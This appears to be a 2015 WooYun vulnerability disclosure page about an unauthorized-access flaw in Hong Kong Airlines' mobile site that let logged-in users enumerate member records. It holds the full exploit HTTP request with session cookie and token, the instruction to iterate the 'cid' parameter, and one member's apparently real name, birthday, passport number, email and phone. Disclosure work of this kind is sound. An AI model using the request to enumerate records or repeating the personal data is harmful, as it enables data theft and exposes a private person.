当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163652

漏洞标题:香港航空缺陷泄露所有金鹏会员详细信息/phone/passport/email/name

相关厂商:香港航空

漏洞作者: BMa

提交时间:2015-12-22 20:13

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

香港航空缺陷泄露所有金鹏会员详细信息/phone/passport/email/name...

详细说明:

POST /ci/index.php/fortune/searchMember HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://m.hongkongairlines.com/html/fortune/card_signOut.html
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: m.hongkongairlines.com
Content-Length: 63
Connection: close
Cache-Control: no-cache
Cookie: PHPSESSID=89a2a744afc998aa686067286ff27cff
email=&ctoke=178ab65d8ca51127dea31de769b2574b_CN&cid=3996302008


登录后遍历cid

漏洞证明:

1.png


2.png


3.png


4.png


5.png


{"msg":"SUCCESS","code":"1000","systemTime":"2015-12-22 20:05:32","birthday":"1964-07-07","first_name":"WONG","last_name":"PIK WAH","nationality":"","pyxing":"WONG","pyming":"PIK WAH","idcard":"","passport":"H0738023301","other":"","email":"AMYHK77@YAHOO.COM.HK","mobile":"85261286682","post_type":"","address_mode":"1","home_country":"","home_country_name":"","home_province":"","home_city":"","home_address":"","home_zipcode":"","home_phone":"","work_country":"","work_country_name":"","work_province":"","work_city":"","work_address":"","work_name":"","work_post":"","work_zipcode":"","work_phone":"","grade":"STANDARD","gradeName":"普通卡","points":"300","title":"MS","expdate":"2017-12-16"}

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-23 15:58

厂商回复:

感谢对海航的支持

最新状态:

暂无